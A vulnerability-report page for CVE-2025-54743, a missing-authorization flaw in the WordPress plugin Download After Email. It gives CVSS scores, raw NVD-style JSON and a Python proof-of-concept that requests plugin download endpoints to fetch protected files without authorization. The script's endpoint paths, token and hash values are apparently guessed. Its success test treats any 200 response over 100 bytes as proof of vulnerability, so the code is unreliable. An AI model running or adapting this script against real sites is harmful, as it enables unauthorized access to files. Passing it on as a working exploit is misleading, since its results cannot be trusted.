Security Vulnerability Report
中文
CVE-2025-54743 CVSS 5.8 MEDIUM

CVE-2025-54743

Published: 2025-12-18 08:15:56
Last Modified: 2026-04-29 10:16:51

Description

Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download After Email: from n/a through 2.1.5-2.1.6.

CVSS Details

CVSS Score
5.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Download After Email插件 2.1.5
Download After Email插件 2.1.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54743 PoC - WordPress Download After Email Plugin Authorization Bypass # Affected Versions: 2.1.5 - 2.1.6 import requests import sys TARGET_URL = "https://example.com" # Replace with target URL def check_vulnerability(): """ Check if the target WordPress site is vulnerable to CVE-2025-54743 Missing Authorization vulnerability in Download After Email plugin """ # Common download endpoint patterns for the plugin endpoints = [ "/wp-content/plugins/download-after-email/includes/download.php", "/wp-content/plugins/download-after-email/download.php", "/wp-admin/admin-ajax.php?action=dae_download", "/?dae_download=1&file=sample.pdf", "/wp-json/download-after-email/v1/download" ] print("[*] Testing CVE-2025-54743 - Missing Authorization in Download After Email") print(f"[*] Target: {TARGET_URL}") for endpoint in endpoints: url = f"{TARGET_URL}{endpoint}" try: response = requests.get(url, timeout=10, allow_redirects=False) # Check if response contains file content without auth if response.status_code == 200: if 'Content-Disposition' in response.headers or len(response.content) > 100: print(f"[!] VULNERABLE: {url}") print(f"[!] Status: {response.status_code}") print(f"[!] Content-Length: {len(response.content)}") return True except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") print("[*] No obvious vulnerability detected on common endpoints") return False def exploit_unauthorized_download(file_id="1"): """ Attempt to download protected file without authorization """ # Try direct download with file ID payloads = [ f"/wp-admin/admin-ajax.php?action=dae_download&file_id={file_id}", f"/wp-content/plugins/download-after-email/download.php?token=test123&file={file_id}", f"/?dae_download=1&file_id={file_id}&hash=invalid" ] for payload in payloads: url = f"{TARGET_URL}{payload}" print(f"[*] Testing: {url}") try: response = requests.get(url, timeout=10) if response.status_code == 200 and len(response.content) > 0: print(f"[!] Possible unauthorized access to file ID: {file_id}") return True except requests.RequestException: pass return False if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54743", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:15:55.930", "lastModified": "2026-04-29T10:16:50.910", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in mkscripts Download After Email download-after-email allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Download After Email: from n/a through 2.1.5-2.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/download-after-email/vulnerability/wordpress-download-after-email-plugin-2-1-5-2-1-6-other-vulnerability-type-vulnerability?_s_id=cve", "source": "[email protected]"}]}}